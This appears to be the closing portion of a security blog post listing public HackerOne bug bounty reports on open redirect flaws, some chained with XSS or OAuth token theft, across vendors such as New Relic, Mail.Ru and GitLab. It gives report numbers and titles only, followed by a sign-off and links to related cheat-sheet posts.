Hackerone report 76738: Open redirect on Zaption, $25
Hackerone report 45516: Open redirect on Zaption
Hackerone report 178278: Open redirect & XSS on Informatica
Hackerone report 123625: Open redirect & XSS on Informatica
Hackerone report 14699: Open redirect on WePay
Hackerone report 20661: Open redirect on WePay
Hackerone report 3596: OAuth token theft via Open redirect on Phabricator
Hackerone report 25160: OAuth token theft via Open redirect on Phabricator
Hackerone report 6564: Open redirect on Khan Academy
Hackerone report 6357: Open redirect on Khan Academy
Hackerone report 145306: Open redirect on Veris
Hackerone report 44157: Open redirect on Vimeo
Hackerone report 11209: Open redirect on Meteor
Hackerone report 131082: Open redirect on ownCloud
Hackerone report 143265: Open redirect on Zomato
Hackerone report 91332: Open redirect on Imgur
Hackerone report 151831: Open redirect on Gratipay
Hackerone report 128910: Open redirect on Gratipay
Hackerone report 48065: Open redirect & OAuth token theft on Coinbase
Hackerone report 127741: Open redirect on New Relic
Hackerone report 132251: Open redirect & XSS on New Relic
Hackerone report 116315: Open redirect on New Relic
Hackerone report 144525: Open redirect on New Relic
Hackerone report 131552: Open redirect on New Relic
Hackerone report 177485: Open redirect on New Relic
Hackerone report 207505: Open redirect on New Relic
Hackerone report 207285: Open redirect on New Relic
Hackerone report 157813: Open redirect & XSS on OLX
Hackerone report 167107: Open redirect & XSS on OLX
Hackerone report 7900: Open redirect & OAuth token theft on Respondly
Hackerone report 244958: Open redirect & OAuth token theft on WakaTime
Hackerone report 405100: Open redirect & OAuth token theft on BOHEMIA INTERACTIVE a.s.
Hackerone report 236599: Open redirect on ExpressionEngine
Hackerone report 316319: Open redirect & XSS on SEMrush
Hackerone report 360797: Open redirect & XSS on Liberapay
Hackerone report 266688: Open redirect & XSS on Razer US
Hackerone report 270028: Open redirect & XSS on Razer US
Hackerone report 266355: Open redirect on Razer US
Hackerone report 220737: Open redirect on Mavenlink
Hackerone report 77221: Open redirect on Mavenlink
Hackerone report 25334: Open redirect on Square
Hackerone report 12949: Open redirect on Urban Dictionary
Hackerone report 12964: Open redirect on Urban Dictionary
Hackerone report 268245: Open redirect & XSS on Mail.Ru
Hackerone report 192373: Open redirect on Mail.Ru
Hackerone report 87804: Open redirect on Mail.Ru
Hackerone report 244721: Open redirect on Mail.Ru
Hackerone report 210384: Open redirect on Mail.Ru
Hackerone report 37593: Open redirect on Sucuri
Hackerone report 2989: Open redirect on OkCupid
Hackerone report 359453: Open redirect on Passit
Hackerone report 163124: Open redirect on Skyliner
Hackerone report 291750: Open redirect on Valve
Hackerone report 193027: Open redirect on Cloudflare
Hackerone report 215970: Open redirect on GitLab
Hackerone report 214034: Open redirect on GitLab
Hackerone report 39198: Open redirect on C2FO
Hackerone report 50379: Open redirect & XSS on Adobe
Hackerone report 238117: Open redirect on Weblate
Hackerone report 224317: Open redirect on Weblate
Hackerone report 223718: Open redirect on Weblate
Hackerone report 223326: Open redirect on Weblate
Hackerone report 243062: Open redirect on Arxius
Hackerone report 207431: Open redirect on Yelp
Hackerone report 211213: Open redirect on Nextcloud
Hackerone report 2414: Open redirect on RelateIQ
Hackerone report 172746: Open redirect on WebSummit
Hackerone report 239503: Open redirect & authentication token disclosure on Maximum, $350
Let me know if you have any comments, requests, questions… Feedback is always welcome.
See you next time!
Related posts
Cypher Injection Cheat Sheet
Posted in Cheatsheets on December 26, 2022
Recon resources
Posted in Cheatsheets on April 15, 2019